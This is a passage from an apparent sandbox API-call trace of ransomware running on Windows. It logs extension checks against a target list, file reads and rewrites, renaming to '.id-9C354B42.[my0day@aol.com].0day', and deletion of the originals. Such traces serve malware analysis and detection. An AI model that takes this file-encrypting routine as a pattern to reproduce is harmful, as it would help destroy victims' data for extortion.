returned 1 [0265.407] lstrlenW (lpString="BCD.LOG") returned 7 [0265.407] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.407] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0265.407] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0265.407] lstrlenW (lpString=".doc") returned 4 [0265.407] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0265.407] lstrlenW (lpString=".docx") returned 5 [0265.407] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0265.407] lstrlenW (lpString=".pdf") returned 4 [0265.407] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0265.407] lstrlenW (lpString=".xls") returned 4 [0265.407] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0265.407] lstrlenW (lpString=".xlsx") returned 5 [0265.407] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0265.407] lstrlenW (lpString=".ppt") returned 4 [0265.407] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0265.407] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0265.407] lstrlenW (lpString=".zip") returned 4 [0265.407] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0265.407] lstrlenW (lpString=".rar") returned 4 [0265.407] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0265.407] lstrlenW (lpString=".bz2") returned 4 [0265.407] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0265.407] lstrlenW (lpString=".7z") returned 3 [0265.407] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0265.407] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0265.407] lstrlenW (lpString=".dbf") returned 4 [0265.407] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0265.407] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0265.407] lstrlenW (lpString=".1cd") returned 4 [0265.407] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0265.407] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0265.407] lstrlenW (lpString=".jpg") returned 4 [0265.407] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0265.408] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0265.408] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0265.408] lstrlenW (lpString=".doc") returned 4 [0265.408] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0265.408] lstrlenW (lpString=".docx") returned 5 [0265.408] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0265.408] lstrlenW (lpString=".pdf") returned 4 [0265.408] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0265.408] lstrlenW (lpString=".xls") returned 4 [0265.408] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0265.408] lstrlenW (lpString=".xlsx") returned 5 [0265.408] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0265.408] lstrlenW (lpString=".ppt") returned 4 [0265.408] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0265.408] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0265.408] lstrlenW (lpString=".zip") returned 4 [0265.408] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0265.408] lstrlenW (lpString=".rar") returned 4 [0265.408] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0265.408] lstrlenW (lpString=".bz2") returned 4 [0265.408] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0265.408] lstrlenW (lpString=".7z") returned 3 [0265.408] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0265.408] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0265.408] lstrlenW (lpString=".dbf") returned 4 [0265.408] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0265.408] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0265.408] lstrlenW (lpString=".1cd") returned 4 [0265.408] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0265.408] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0265.408] lstrlenW (lpString=".jpg") returned 4 [0265.408] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0265.409] Sleep (dwMilliseconds=0x64) [0265.564] lstrcmpiW (lpString1=".log", lpString2=".0day") returned 1 [0265.564] lstrlenW (lpString="bootex.log") returned 10 [0265.564] CreateFileW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0265.619] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=5120) returned 1 [0265.619] CloseHandle (hObject=0x2cc) returned 1 [0265.619] GetFileAttributesW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log")) returned 0x80 [0265.651] GetFileAttributesW (lpFileName="C:\\bootex.log.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\bootex.log.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0265.651] CreateFileW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0265.651] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0265.651] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0265.651] CreateFileW (lpFileName="C:\\bootex.log.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\bootex.log.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0265.655] GetLastError () returned 0x0 [0265.655] ReadFile (in: hFile=0x2f8, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x1400, lpOverlapped=0x0) returned 1 [0265.667] WriteFile (in: hFile=0x300, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x1410, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1410, lpOverlapped=0x0) returned 1 [0265.668] ReadFile (in: hFile=0x2f8, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0265.668] WriteFile (in: hFile=0x300, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xe8, lpOverlapped=0x0) returned 1 [0265.668] SetEndOfFile (hFile=0x300) returned 1 [0265.669] CloseHandle (hObject=0x300) returned 1 [0265.669] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0265.669] SetEndOfFile (hFile=0x2f8) returned 1 [0265.670] CloseHandle (hObject=0x2f8) returned 1 [0265.670] SetFileAttributesW (lpFileName="C:\\bootex.log.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x80) returned 1 [0265.670] DeleteFileW (lpFileName="C:\\bootex.log" (normalized: "c:\\bootex.log")) returned 1 [0265.670] lstrlenW (lpString="C:\\bootex.log") returned 13 [0265.670] lstrlenW (lpString="C:\\bootex.log") returned 13 [0265.670] lstrlenW (lpString=".doc") returned 4 [0265.670] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0265.670] lstrlenW (lpString=".docx") returned 5 [0265.670] lstrcmpiW (lpString1=".docx", lpString2="x.log") returned -1 [0265.670] lstrlenW (lpString=".pdf") returned 4 [0265.670] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0265.670] lstrlenW (lpString=".xls") returned 4 [0265.670] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0265.670] lstrlenW (lpString=".xlsx") returned 5 [0265.670] lstrcmpiW (lpString1=".xlsx", lpString2="x.log") returned -1 [0265.670] lstrlenW (lpString=".ppt") returned 4 [0265.670] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0265.670] lstrlenW (lpString="C:\\bootex.log") returned 13 [0265.670] lstrlenW (lpString=".zip") returned 4 [0265.670] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0265.671] lstrlenW (lpString=".rar") returned 4 [0265.671] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0265.671] lstrlenW (lpString=".bz2") returned 4 [0265.671] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0265.671] lstrlenW (lpString=".7z") returned 3 [0265.671] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0265.671] lstrlenW (lpString="C:\\bootex.log") returned 13 [0265.671] lstrlenW (lpString=".dbf") returned 4 [0265.671] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0265.671] lstrlenW (lpString="C:\\bootex.log") returned 13 [0265.671] lstrlenW (lpString=".1cd") returned 4 [0265.671] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0265.671] lstrlenW (lpString="C:\\bootex.log") returned 13 [0265.671] lstrlenW (lpString=".jpg") returned 4 [0265.671] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0265.671] lstrlenW (lpString="C:\\bootex.log") returned 13 [0265.671] lstrlenW (lpString="C:\\bootex.log") returned 13 [0265.671] lstrlenW (lpString=".doc") returned 4 [0265.671] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0265.671] lstrlenW (lpString=".docx") returned 5 [0265.671] lstrcmpiW (lpString1=".docx", lpString2="x.log") returned -1 [0265.671] lstrlenW (lpString=".pdf") returned 4 [0265.671] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0265.671] lstrlenW (lpString=".xls") returned 4 [0265.671] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0265.671] lstrlenW (lpString=".xlsx") returned 5 [0265.671] lstrcmpiW (lpString1=".xlsx", lpString2="x.log") returned -1 [0265.671] lstrlenW (lpString=".ppt") returned 4 [0265.671] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0265.671] lstrlenW (lpString="C:\\bootex.log") returned 13 [0265.671] lstrlenW (lpString=".zip") returned 4 [0265.671] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0265.671] lstrlenW (lpString=".rar") returned 4 [0265.672] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0265.672] lstrlenW (lpString=".bz2") returned 4 [0265.672] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0265.672] lstrlenW (lpString=".7z") returned 3 [0265.672] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0265.672] lstrlenW (lpString="C:\\bootex.log") returned 13 [0265.672] lstrlenW (lpString=".dbf") returned 4 [0265.672] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0265.672] lstrlenW (lpString="C:\\bootex.log") returned 13 [0265.672] lstrlenW (lpString=".1cd") returned 4 [0265.672] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0265.672] lstrlenW (lpString="C:\\bootex.log") returned 13 [0265.672] lstrlenW (lpString=".jpg") returned 4 [0265.672] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0265.672] Sleep (dwMilliseconds=0x64) [0265.803] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0265.804] lstrlenW (lpString="boxed-correct.avi") returned 17 [0265.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0266.218] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=89600) returned 1 [0266.218] CloseHandle (hObject=0x300) returned 1 [0266.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0266.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0266.218] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0266.219] lstrlenW (lpString=".doc") returned 4 [0266.219] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.219] lstrlenW (lpString=".docx") returned 5 [0266.219] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0266.219] lstrlenW (lpString=".pdf") returned 4 [0266.219] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.219] lstrlenW (lpString=".xls") returned 4 [0266.219] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.219] lstrlenW (lpString=".xlsx") returned 5 [0266.219] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0266.219] lstrlenW (lpString=".ppt") returned 4 [0266.219] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0266.219] lstrlenW (lpString=".zip") returned 4 [0266.219] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.219] lstrlenW (lpString=".rar") returned 4 [0266.219] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.219] lstrlenW (lpString=".bz2") returned 4 [0266.219] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.219] lstrlenW (lpString=".7z") returned 3 [0266.219] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0266.219] lstrlenW (lpString=".dbf") returned 4 [0266.219] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0266.219] lstrlenW (lpString=".1cd") returned 4 [0266.219] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0266.219] lstrlenW (lpString=".jpg") returned 4 [0266.219] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0266.219] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0266.219] lstrlenW (lpString=".doc") returned 4 [0266.219] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.219] lstrlenW (lpString=".docx") returned 5 [0266.219] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0266.220] lstrlenW (lpString=".pdf") returned 4 [0266.220] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.220] lstrlenW (lpString=".xls") returned 4 [0266.220] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.220] lstrlenW (lpString=".xlsx") returned 5 [0266.220] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0266.220] lstrlenW (lpString=".ppt") returned 4 [0266.220] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0266.220] lstrlenW (lpString=".zip") returned 4 [0266.220] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.220] lstrlenW (lpString=".rar") returned 4 [0266.220] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.220] lstrlenW (lpString=".bz2") returned 4 [0266.220] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.220] lstrlenW (lpString=".7z") returned 3 [0266.220] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0266.220] lstrlenW (lpString=".dbf") returned 4 [0266.220] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0266.220] lstrlenW (lpString=".1cd") returned 4 [0266.220] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0266.220] lstrlenW (lpString=".jpg") returned 4 [0266.220] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.220] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0266.220] lstrlenW (lpString="correct.avi") returned 11 [0266.220] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0266.221] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=197120) returned 1 [0266.221] CloseHandle (hObject=0x300) returned 1 [0266.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0266.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.221] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0266.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0266.221] lstrlenW (lpString=".doc") returned 4 [0266.221] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.221] lstrlenW (lpString=".docx") returned 5 [0266.221] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0266.221] lstrlenW (lpString=".pdf") returned 4 [0266.221] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.221] lstrlenW (lpString=".xls") returned 4 [0266.221] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.221] lstrlenW (lpString=".xlsx") returned 5 [0266.221] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0266.221] lstrlenW (lpString=".ppt") returned 4 [0266.221] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0266.221] lstrlenW (lpString=".zip") returned 4 [0266.221] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.221] lstrlenW (lpString=".rar") returned 4 [0266.221] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.221] lstrlenW (lpString=".bz2") returned 4 [0266.221] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.221] lstrlenW (lpString=".7z") returned 3 [0266.221] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0266.221] lstrlenW (lpString=".dbf") returned 4 [0266.221] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0266.221] lstrlenW (lpString=".1cd") returned 4 [0266.221] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0266.222] lstrlenW (lpString=".jpg") returned 4 [0266.222] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0266.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0266.222] lstrlenW (lpString=".doc") returned 4 [0266.222] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.222] lstrlenW (lpString=".docx") returned 5 [0266.222] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0266.222] lstrlenW (lpString=".pdf") returned 4 [0266.222] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.222] lstrlenW (lpString=".xls") returned 4 [0266.222] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.222] lstrlenW (lpString=".xlsx") returned 5 [0266.222] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0266.222] lstrlenW (lpString=".ppt") returned 4 [0266.222] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0266.222] lstrlenW (lpString=".zip") returned 4 [0266.222] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.222] lstrlenW (lpString=".rar") returned 4 [0266.222] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.222] lstrlenW (lpString=".bz2") returned 4 [0266.222] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.222] lstrlenW (lpString=".7z") returned 3 [0266.222] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.222] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0266.222] lstrlenW (lpString=".dbf") returned 4 [0266.223] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0266.223] lstrlenW (lpString=".1cd") returned 4 [0266.223] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.223] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0266.223] lstrlenW (lpString=".jpg") returned 4 [0266.223] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0266.223] lstrcmpiW (lpString1=".avi", lpString2=".0day") returned 1 [0266.223] lstrlenW (lpString="delete.avi") returned 10 [0266.223] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0266.311] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=224256) returned 1 [0266.316] CloseHandle (hObject=0x2cc) returned 1 [0266.324] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20 [0266.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0266.346] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0266.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0266.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0266.347] lstrlenW (lpString=".doc") returned 4 [0266.347] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0266.347] lstrlenW (lpString=".docx") returned 5 [0266.347] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0266.347] lstrlenW (lpString=".pdf") returned 4 [0266.347] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0266.347] lstrlenW (lpString=".xls") returned 4 [0266.347] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0266.347] lstrlenW (lpString=".xlsx") returned 5 [0266.347] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0266.347] lstrlenW (lpString=".ppt") returned 4 [0266.347] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0266.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0266.347] lstrlenW (lpString=".zip") returned 4 [0266.347] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0266.347] lstrlenW (lpString=".rar") returned 4 [0266.347] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0266.347] lstrlenW (lpString=".bz2") returned 4 [0266.347] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0266.347] lstrlenW (lpString=".7z") returned 3 [0266.347] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0266.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0266.347] lstrlenW (lpString=".dbf") returned 4 [0266.347] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0266.347] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0266.347] lstrlenW (lpString=".1cd") returned 4 [0266.347] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0266.348] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 